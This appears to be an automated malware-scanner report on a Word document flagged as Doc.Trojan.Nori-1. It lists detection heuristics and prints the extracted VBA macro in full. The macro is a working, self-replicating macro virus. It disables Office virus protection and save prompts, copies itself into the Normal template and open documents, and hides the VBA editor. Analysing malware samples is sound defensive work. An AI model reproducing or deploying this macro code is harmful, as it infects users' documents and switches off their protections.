MALICIOUS
228
Risk Score
Heuristics 5
-
ClamAV: Doc.Trojan.Nori-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Nori-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.DeleteLines 8 -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8080 bytes |
SHA-256: 50b5a091f6f5cee4ab646dbb9f6e9a98f8914782018ff8b704d7dfc1f28db34f |
|||
|
Detection
ClamAV:
Doc.Trojan.Nori-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Unit"
Sub ToN()
'Iron
On Error Resume Next
file = "c:\Iron.tmp"
Un = "Unit"
With NormalTemplate.VBProject.VBComponents
'8
Kill (file)
End With
End Sub
Sub ToA()
On Error Resume Next
file = "c:\Iron.tmp"
Un = "Unit"
With ActiveDocument.VBProject.VBComponents
'18
'18
Kill (file)
End With
End Sub
Sub AutoOpen()
On Error Resume Next
If options.VirusProtection Then options.VirusProtection = Not options.VirusProtection
If options.ConfirmConversions Then options.ConfirmConversions = Not options.ConfirmConversions
If options.SaveNormalPrompt Then options.SaveNormalPrompt = Not options.SaveNormalPrompt
file = "c:\Iron.tmp"
Un = "Unit"
If NormalTemplate.VBProject.VBComponents.Item(Un).CodeModule.Lines(2, 1) <> "'Iron" Then
ActiveDocument.VBProject.VBComponents(Un).Export (file)
With ActiveDocument.VBProject.VBComponents(Un).CodeModule
.DeleteLines 8
.InsertLines 8, " .import (file)"
End With
Call ToN
With ActiveDocument.VBProject.VBComponents(Un).CodeModule
.DeleteLines 8
.InsertLines 8, " '8"
End With
End If
If ActiveDocument.VBProject.VBComponents.Item(Un).CodeModule.Lines(2, 1) <> "'Iron" Then
NormalTemplate.VBProject.VBComponents(Un).Export (file)
With NormalTemplate.VBProject.VBComponents(Un).CodeModule
.DeleteLines 18
.InsertLines 18, " ActiveDocument.VBProject.VBComponents.import (file)"
End With
Call ToA
With NormalTemplate.VBProject.VBComponents(Un).CodeModule
.DeleteLines 18
.InsertLines 18, " '18"
End With
NormalTemplate.Save
End If
End Sub
Sub ViewVBCode()
On Error Resume Next
Application.ShowVisualBasicEditor = False
End Sub
Private Sub Document_New()
Call AutoOpen
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.